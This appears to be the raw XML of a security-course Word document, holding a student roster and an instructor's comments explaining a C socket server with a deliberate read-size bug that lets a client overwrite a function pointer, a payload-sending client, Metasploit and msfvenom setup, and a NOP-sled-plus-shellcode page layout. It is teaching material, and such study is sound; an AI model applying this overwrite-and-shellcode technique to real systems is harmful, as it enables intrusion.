          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Gili </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Barlev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258A6F8" w14:textId="206F57AD" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Bria Gray</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751A198" w14:textId="5A83B503" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Richy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hastings</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7D87B" w14:textId="4D7E279C" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Austin Mello</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04F8D7" w14:textId="7A94081D" w:rsidR="00F57B5B" w:rsidRPr="00EA65ED" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Wren Miles</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE88A4C" w14:textId="4F7746A4" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E445B9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Aaron Van Cleave</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331FEBE" w14:textId="0CBDAC95" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E445B9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Christopher Wycoff</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730B11C" w14:textId="5D4CDBE5" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6AED">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Patrick </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF6AED">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Thomasma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132EC15F" w14:textId="77777777" w:rsidR="00F860C8" w:rsidRDefault="00F860C8" w:rsidP="00FC4902"/>
    <w:p w14:paraId="173EEBB2" w14:textId="66A5D211" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="008F7543">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC49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ingjiu Li" w:date="2020-02-06T09:15:00Z" w:initials="YL">
    <w:p w14:paraId="22F2FEE5" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="000727B1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="00846DE5">
        <w:t>socket(AF_INET, SOCK_STREAM, 0): AF_INET means Internet domain, SOCK_STREAM means data stream socket instead of datagram socket; 0 means TCP protocol for data stream socket. This function returns a positive integer for success, or -1 for fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F295348" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6CE4EB" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>A sockaddr_in is a structure containing an internet address. This structure is defined in &lt;netinet/in.h&gt;. Here is the definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F96FD90" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>struct sockaddr_in {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A5041" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        short   sin_family;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35D0BE" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        u_short sin_port;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95B7B3" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        struct  in_addr sin_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB55473" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        char    sin_zero[8];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33759486" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF9CDD" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C1AF5C" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>htonl(INADDR_ANY) is the IP address of the machine on which the server is running (converted to network byte order format by htonl), and the symbolic constant INADDR_ANY gets this address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C715DE6" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042C159A" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>htons(5099) hardcodes the port number in network byte order format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A456EA4" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B25E2C" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>bind() binds the defined sockaddr (including server IP and port 5099) to the socket file descriptor listenfd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D39A99" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DEA68B" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>listen(listenfd, 10) is a system call for the process to listen on the socket for connections. 10 is the size of the backlog queue, i.e., the number of connections that can be waiting while the process is handling a particular connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7D680" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DCA239" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>accept() is a system call for the process to block until a client connects to the server. It wakes up the process when a connection from a client has been successfully established. It returns a new file descriptor connfd, and all communication on this connection should be done using the new file descriptor. NULL means no information about the remote/client address (and its length) of the accepted socket is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948479C" w14:textId="77777777" w:rsidR="00846DE5" w:rsidRDefault="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E069C9" w14:textId="14F022E3" w:rsidR="000727B1" w:rsidRDefault="00846DE5" w:rsidP="00846DE5">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">handle_conn(connfd) is explained below in the file. </w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Yingjiu Li" w:date="2020-02-06T10:02:00Z" w:initials="YL">
    <w:p w14:paraId="2F9DD46D" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="000727B1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="005143F1">
        <w:t>p and q are two string buffers defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB2367" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB9FD09" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>Structure s includes nbytes (the size of client message) and fp (a function pointer taking char* input and returning void).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D1B37" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2279B166" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>read() is a system call to read up to sizeof(s)=8 bytes (correct writing should be sizeof(s.nbytes) =4 bytes) from file descriptor fd into the buffer starting at &amp;(s.nbytes). The first 4 bytes of fd should be the upper bound of the client’s message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197542C" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1584E5B7" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>(s.nbytes?1:0)  is equal to 1 if s.nbytes is not zero, and equal 0 otherwise. Thus, npages is the number of pages to hold the incoming client message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D6D22" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F00680C" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>void *mmap(void *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, size_t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>prot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, off_t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA48520" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>If addr is NULL, then the kernel chooses the (page-aligned) address at which to create the mapping; fd=-1 for anonymous mapping (not backed by a file); offset=0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9404A1" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48824C76" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>read() in the while-loop reads nbytes from fd to memory at p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC18A4" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500A3A3F" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After pointers p and q are printed out, s.fp converts the content at p (only the part before end-string symbol ‘0’) to upper case. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33696797" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB7EA7D" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>write() writes the content at p ( only the part before ‘0’) in upper case and write it back to the client with one additional end-string char ‘0’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ABA70F" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F26821" w14:textId="2B34C8C9" w:rsidR="000727B1" w:rsidRDefault="005143F1" w:rsidP="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">strlen(p)= the actual size of client message excluding ‘0’ </w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="Yingjiu Li" w:date="2020-02-06T14:58:00Z" w:initials="YL">
    <w:p w14:paraId="2BF9E6AE" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="000727B1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="005143F1">
        <w:t>sockfd should be connected to the server’s address (including server IP address and server port number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13622D" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAA1E54" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>v.nbytes defines the size of client message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A6F62" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306FC789" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>write(sockfd, &amp;v, sizeof(v.nbytes)) writes v.nbytes of sizeof(v.nbytes)=4 bytes from memory &amp;v (i.e., 4-byte value 4096) to sockfd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46B0CE" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9502A9" w14:textId="71F9A719" w:rsidR="000727B1" w:rsidRDefault="005143F1" w:rsidP="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>memset(void *str, int c, size_t n) copies the character c (an unsigned char) to the first n characters of the string pointed to, by the argument str; therefore, payload_buf is one page of char 0 (i.e., \0 or NUL) and its first segment is copied from argv[1]</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="3" w:author="Yingjiu Li" w:date="2020-02-06T22:32:00Z" w:initials="YL">
    <w:p w14:paraId="1D2EB178" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="000727B1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="005143F1">
        <w:t>Metasploit is part of Kali Linux. You may download it separately from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1" w:history="1">
        <w:r w:rsidR="005143F1" w:rsidRPr="008A75A0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005143F1">
        <w:t xml:space="preserve"> website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B0C42" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More on Metasploit-framework at </w:t>
      </w:r>
      <w:hyperlink r:id="rId2" w:history="1">
        <w:r w:rsidRPr="008A75A0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sciencedirect.com/topics/computer-science/metasploit-framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1F446" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> replaced both msfpayload and msfencode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B351964" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1BE3D2" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>Add the following paths to system environment variable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFFEEF7" w14:textId="77777777" w:rsidR="005143F1" w:rsidRDefault="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>C:\metasploit-framework\bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76659EE9" w14:textId="547F675A" w:rsidR="000727B1" w:rsidRDefault="005143F1" w:rsidP="005143F1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>C:\metasploit-framework\embedded</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="4" w:author="Yingjiu Li" w:date="2021-05-03T13:17:00Z" w:initials="YL">
    <w:p w14:paraId="463E2413" w14:textId="59A2E0BA" w:rsidR="0011585B" w:rsidRDefault="0011585B" w:rsidP="0011585B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>100K pages, where 1st page includes arg[1] string and null, 100K-2 pages consist of NOP, and the last page includes shell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069C9" w15:done="0"/>
  <w15:commentEx w15:paraId="06F26821" w15:done="0"/>
  <w15:commentEx w15:paraId="0C9502A9" w15:done="0"/>
  <w15:commentEx w15:paraId="76659EE9" w15:done="0"/>
  <w15:commentEx w15:paraId="463E2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7684" w16cex:dateUtc="2021-05-03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069C9" w16cid:durableId="21E657A6"/>
  <w16cid:commentId w16cid:paraId="06F26821" w16cid:durableId="21E66299"/>
  <w16cid:commentId w16cid:paraId="0C9502A9" w16cid:durableId="21E6A82F"/>
  <w16cid:commentId w16cid:paraId="76659EE9" w16cid:durableId="21E7128C"/>
  <w16cid:commentId w16cid:paraId="463E2413" w16cid:durableId="243A76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B02B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EF28BD8"/>
    <w:lvl w:ilvl="0" w:tplc="73F645C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3F447800" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="291C8736" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="973EA66C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0CB0128A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AB78B7DC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
